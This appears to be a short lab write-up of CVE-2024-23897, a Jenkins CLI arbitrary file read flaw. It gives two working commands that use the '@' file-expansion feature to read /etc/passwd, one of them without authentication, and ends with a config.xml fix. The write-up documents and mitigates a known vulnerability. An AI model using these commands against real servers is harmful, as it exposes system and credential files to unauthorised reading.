The issue, assigned the CVE identifier CVE-2024-23897, has been described as an arbitrary file read vulnerability through the built-in command line interface. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file's contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it.

For this PoC, I have installed Jenkins 2.426.2 with Docker to test the exploit of the vulnerability

docker run -p 8080:8080 -p 50000:50000 -v jenkins_home:/var/jenkins_home jenkins/jenkins:2.426.2

After creating a user and a password, I downloaded the Jenkins CLI client (jenkins-cli.jar) on my attacking machine.

Then, I wrote the command for the exploit. In this command, we need to have the credentials of the Jenkins user.

java -jar jenkins-cli.jar -s http://192.168.1.45:8080/ -auth "user:aze+123" connect-node "@/etc/passwd"

Another command allows displaying the first lines of a file without authentication.

java -jar jenkins-cli.jar -noCertificateCheck -s 'http://192.168.1.45:8080' help "@/etc/passwd"

To counter this vulnerability, you need to navigate to the Jenkins configuration file named config.xml (in my case, it is located in my Docker container, so I switch to shell mode in my container)

<expandAtFiles>false</expandAtFiles>

and restart jenkins :

service jenkins restart